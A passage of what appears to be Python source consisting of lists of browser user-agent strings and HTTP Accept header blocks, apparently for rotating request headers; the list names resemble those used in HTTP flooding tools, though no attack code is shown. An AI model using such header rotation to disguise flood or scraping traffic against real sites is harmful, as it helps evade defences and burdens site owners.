'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
acceptall = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept-Encoding: gzip, deflate\r\n',
'Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n',
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xhtml+xml',
'Accept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n',
'Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n']
mozila = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
